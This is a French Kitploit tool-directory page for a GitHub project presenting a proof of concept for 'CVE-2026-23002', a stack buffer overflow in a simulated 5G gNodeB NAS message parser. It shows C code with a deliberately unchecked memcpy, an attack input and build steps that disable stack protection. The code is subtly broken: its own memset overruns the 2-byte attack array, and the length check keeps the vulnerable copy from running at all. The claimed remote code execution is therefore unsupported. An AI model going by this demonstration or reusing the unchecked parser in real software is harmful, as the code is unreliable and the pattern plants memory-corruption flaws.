Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB — Analyseur NAS gNodeB 5G simulé avec un PoC de débordement de tampon de pile pour CVE-2026-23002 ; un message NAS forgé déclenche une exécution de code à distance. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb
Sécurité des Systèmes EmbarquésAnalyse des VulnérabilitésExploitationSécurité RéseauExploitation de Binaires
GitHubgeorge0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb

CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB

Analyseur NAS gNodeB 5G simulé avec un PoC de débordement de tampon de pile pour CVE-2026-23002 ; un message NAS forgé déclenche une exécution de code à distance.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 15 joursPas encore vérifié

CVE-2026-23002 – Débordement de tampon du message NAS 5G dans gNodeB

Code du programme (simulation en C)

root@kitploit:~
// gnb_nas_sim.c - Simulated 5G gNodeB parsing NAS Registration Request
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MAX_IE_SIZE 128

void process_registration_request(uint8_t *nas_msg, uint16_t length) {
    uint8_t ie_buffer[MAX_IE_SIZE];
    // Read IE length from message; if length > MAX_IE_SIZE, buffer overflow
    uint16_t ie_length = (nas_msg[0] << 8) | nas_msg[1];
    if (ie_length > 0 && ie_length <= length - 2) {
        memcpy(ie_buffer, nas_msg + 2, ie_length); // no bounds check!
        printf("IE copied, size %d\n", ie_length);
    }
}

int main() {
    // Craft a NAS message with an oversized IE length
    uint8_t attack[] = {0x01, 0x00}; // IE length = 256, but buffer is only 128 bytes
    // Append padding to make length consistent
    memset(attack+2, 'A', 254);
    process_registration_request(attack, sizeof(attack));
    return 0;
}

CVE-2026-23002 – Débordement de tampon du message NAS 5G dans gNodeB

Severity: Critical

Aperçu

L'analyseur de la strate de non-accès (NAS) 5G dans un gNodeB simulé ne valide pas le champ de longueur de l'élément d'information. Un attaquant envoyant une demande d'enregistrement spécialement conçue peut déborder un tampon de pile, conduisant à l'exécution de code à distance sur la station de base.

Détails de la vulnérabilité

  • Type: Débordement de tampon de pile
  • Impact: Compromission totale de la station de base, perturbation du réseau.
  • Cause racine: La longueur de l'IE NAS est considérée comme fiable sans vérification des limites par rapport à la taille du tampon de destination.

Démonstration de l'exploit

Compilez et exécutez l'analyseur vulnérable :

root@kitploit:~
gcc -o gnb_nas_sim gnb_nas_sim.c -fno-stack-protector
./gnb_nas_sim

Le programme plante avec une erreur de segmentation (corruption de la pile).

Télécharger l’outil